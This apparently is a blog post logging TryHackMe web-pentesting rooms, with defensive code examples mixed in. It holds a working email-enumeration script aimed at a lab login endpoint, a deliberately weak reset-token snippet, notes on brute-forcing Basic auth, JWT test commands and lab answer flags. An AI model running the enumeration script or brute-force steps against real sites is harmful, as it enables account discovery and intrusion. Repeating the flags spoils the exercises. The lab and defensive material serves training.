
Training Update v0.87


It’s Wednesday the 2nd of April and it’s (yes we know) time for more THM!

Today we move on to the Web Application Pentesting pathway!

We start off with the Enumeration & Brute Force room to kick this all off!

```python
import requests
import sys


def check_email(email):
    url = 'http://enum.thm/labs/verbose_login/functions.php'  # Location of the login function
    headers = {
        'Host': 'enum.thm',
        'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Origin': 'http://enum.thm',
        'Connection': 'close',
        'Referer': 'http://enum.thm/labs/verbose_login/',
    }
    data = {
        'username': email,
        'password': 'password',  # Use a random password as we are only checking the email
        'function': 'login'
    }
    response = requests.post(url, headers=headers, data=data)
    return response.json()


def enumerate_emails(email_file):
    valid_emails = []
    invalid_error = "Email does not exist"  # Error message for invalid emails
    with open(email_file, 'r') as file:
        emails = file.readlines()
    for email in emails:
        email = email.strip()  # Remove any leading/trailing whitespace
        if email:
            response_json = check_email(email)
            if response_json['status'] == 'error' and invalid_error in response_json['message']:
                print(f"[INVALID] {email}")
            else:
                print(f"[VALID] {email}")
                valid_emails.append(email)
    return valid_emails


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 script.py <email_list_file>")
        sys.exit(1)
    email_file = sys.argv[1]
    valid_emails = enumerate_emails(email_file)
    print("\nValid emails found:")
    for valid_email in valid_emails:
        print(valid_email)
```
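The script above only works because the login function answers an unknown email with a different message ("Email does not exist") than it gives for a wrong password. The following is an added example, not code from the room or from this post, that puts that verbose handler next to a hardened one which returns a single generic failure message and always computes the password hash, so neither the text nor the response time reveals whether the account exists. USERS, the salt, and the function names are constructed for the demo.

```python
import hashlib
import hmac
import secrets


def _hash(password: str, salt: bytes) -> bytes:
    # PBKDF2 stands in for whatever password hash the real application uses.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


# Constructed user table for the demo: email -> password hash.
_SALT = b"constructed-demo-salt"
USERS = {"alice@example.com": _hash("correct horse", _SALT)}


def verbose_login(email: str, password: str) -> dict:
    """Mirrors the behaviour the enumeration script relies on: the failure
    message differs depending on whether the email exists."""
    stored = USERS.get(email)
    if stored is None:
        return {"status": "error", "message": "Email does not exist"}
    if not hmac.compare_digest(stored, _hash(password, _SALT)):
        return {"status": "error", "message": "Invalid password"}
    return {"status": "ok", "message": "Logged in"}


# A throw-away hash so the unknown-email path costs the same as the known-email path.
_DUMMY_HASH = _hash(secrets.token_hex(8), _SALT)


def uniform_login(email: str, password: str) -> dict:
    """Hardened form: one generic message for every failure, and the password
    hash is computed even when the email is unknown."""
    stored = USERS.get(email, _DUMMY_HASH)
    password_ok = hmac.compare_digest(stored, _hash(password, _SALT))
    if not (password_ok and email in USERS):
        return {"status": "error", "message": "Invalid email or password"}
    return {"status": "ok", "message": "Logged in"}


def leaks_existence(handler) -> bool:
    """True if the handler's failure message for an unknown email differs from
    its message for a known email with the wrong password."""
    unknown = handler("nobody@example.com", "x")["message"]
    wrong_password = handler("alice@example.com", "x")["message"]
    return unknown != wrong_password
```

A quick check such as `leaks_existence(verbose_login)` returning True while `leaks_existence(uniform_login)` returns False is the property to test for in a login handler; the real fix is in the application, not in hiding the endpoint.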
```php
$token = mt_rand(100, 200); // only 101 possible values, and mt_rand is not a CSPRNG
$query = $conn->prepare("UPDATE users SET reset_token = ? WHERE email = ?");
$query->bind_param("ss", $token, $email);
$query->execute();
```
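With mt_rand(100, 200) there are only 101 possible reset tokens, small enough to try every one. The following added example (not from the room or this post; the in-memory store, the 15-minute lifetime and the function names are assumptions) measures that token space in bits against a token from the OS CSPRNG, and shows the rest of a safe reset flow: store only a hash of the token, expire it, compare in constant time, and accept it once.

```python
import hashlib
import hmac
import math
import secrets
import time
from typing import Dict, Optional, Tuple


def token_entropy_bits(low: int, high: int) -> float:
    """Bits of entropy in a token drawn uniformly from the inclusive range [low, high]."""
    return math.log2(high - low + 1)


# Constructed in-memory stand-in for the users table: email -> (sha256(token), expiry timestamp)
RESET_STORE: Dict[str, Tuple[str, float]] = {}
TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime for the demo


def _digest(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def issue_reset_token(email: str, now: Optional[float] = None) -> str:
    """Create a 256-bit token from the OS CSPRNG, store only its hash, and return the token
    (the real flow would e-mail it rather than return it)."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    RESET_STORE[email] = (_digest(token), now + TOKEN_TTL_SECONDS)
    return token


def verify_reset_token(email: str, token: str, now: Optional[float] = None) -> bool:
    """Accept a token only before expiry, compared in constant time, and only once."""
    now = time.time() if now is None else now
    entry = RESET_STORE.get(email)
    if entry is None:
        return False
    stored_digest, expiry = entry
    if now >= expiry:
        RESET_STORE.pop(email, None)  # expired tokens are discarded, not retried
        return False
    if not hmac.compare_digest(stored_digest, _digest(token)):
        return False
    RESET_STORE.pop(email, None)  # single use
    return True
```

token_entropy_bits(100, 200) comes out at about 6.66 bits, against 256 bits for secrets.token_urlsafe(32); storing the hash rather than the token means a database read alone is not enough to complete a reset.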

Flag – THM{50_pr3d1ct4BL333!!}


Add a second rule: encode as base64


Remove the = (padding)
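The two rules above turn each username:password pair into the base64 value that goes into the Authorization: Basic header. From the defender's side, the following is an added example (not from the room or this post) that decodes such headers, including ones with the = padding removed as described, and counts failed attempts per client over a few constructed log lines in a hypothetical "ip status authorization-value" format, flagging clients that exceed a threshold.

```python
import base64
import binascii
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple


def decode_basic_credentials(header_value: str) -> Optional[Tuple[str, str]]:
    """Decode an 'Authorization: Basic <b64>' value into (user, password).

    Padding may have been stripped by the client, so it is restored before decoding;
    anything that is not well-formed Basic auth returns None."""
    scheme, _, b64 = header_value.strip().partition(" ")
    b64 = b64.strip()
    if scheme.lower() != "basic" or not b64:
        return None
    b64 += "=" * (-len(b64) % 4)  # re-add padding to a multiple of four characters
    try:
        raw = base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    if not sep:
        return None
    return user, password


# Hypothetical log format for the demo: "<client ip> <http status> <Authorization value>"
LOG_RE = re.compile(r"^(\S+) (\d{3}) (.+)$")

# Constructed sample lines: one client cycling passwords for 'admin', one ordinary login.
SAMPLE_LOG: List[str] = [
    "10.0.0.5 401 Basic YWRtaW46cGFzc3dvcmQ",   # admin:password, padding stripped
    "10.0.0.5 401 Basic YWRtaW46MTIzNDU2",      # admin:123456
    "10.0.0.5 401 Basic YWRtaW46bGV0bWVpbg",    # admin:letmein, padding stripped
    "10.0.0.5 401 Basic YWRtaW46cXdlcnR5",      # admin:qwerty
    "10.0.0.5 200 Basic YWRtaW46aHVudGVyMg",    # admin:hunter2, padding stripped
    "10.0.0.9 200 Basic Ym9iOnNlY3JldA==",      # bob:secret, padding intact
]


def flag_basic_auth_bruteforce(lines: Iterable[str], threshold: int = 3) -> Dict[str, dict]:
    """Return {ip: {"failures": n, "usernames": [...]}} for each client whose count of
    401 responses carrying decodable Basic credentials reaches the threshold."""
    failures: Dict[str, int] = defaultdict(int)
    usernames: Dict[str, set] = defaultdict(set)
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, status, auth = match.groups()
        creds = decode_basic_credentials(auth)
        if creds is None:
            continue
        usernames[ip].add(creds[0])
        if status == "401":
            failures[ip] += 1
    return {ip: {"failures": n, "usernames": sorted(usernames[ip])}
            for ip, n in failures.items() if n >= threshold}
```

On the sample lines 10.0.0.5 is flagged with four failures against one username and then a success, the shape of a password-guessing run; the usernames list is what you would pivot on to decide whether to lock the account or block the source.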


Flag – THM{b4$$1C_AuTTHHH}


Now we move on to the Session Management module!


Now we move on to the JWT Security room!

```shell
curl -H 'Content-Type: application/json' -X POST -d '{ "username" : "user", "password" : "passwordX" }' http://10.10.22.216/api/v1.0/exampleX
curl -H 'Authorization: Bearer [JWT token]' http://10.10.22.216/api/v1.0/example2?username=Y
```

https://jwt.io


Flag – THM{9cc039cc-d85f-45d1-ac3b-818c8383a560}


Flag – THM{6e32dca9-0d10-4156-a2d9-5e5c7000648a}


This module/room I’m not quite getting at the present moment so we shall continue this tomorrow!


Until next time & don’t sleepwalk through life!

Slán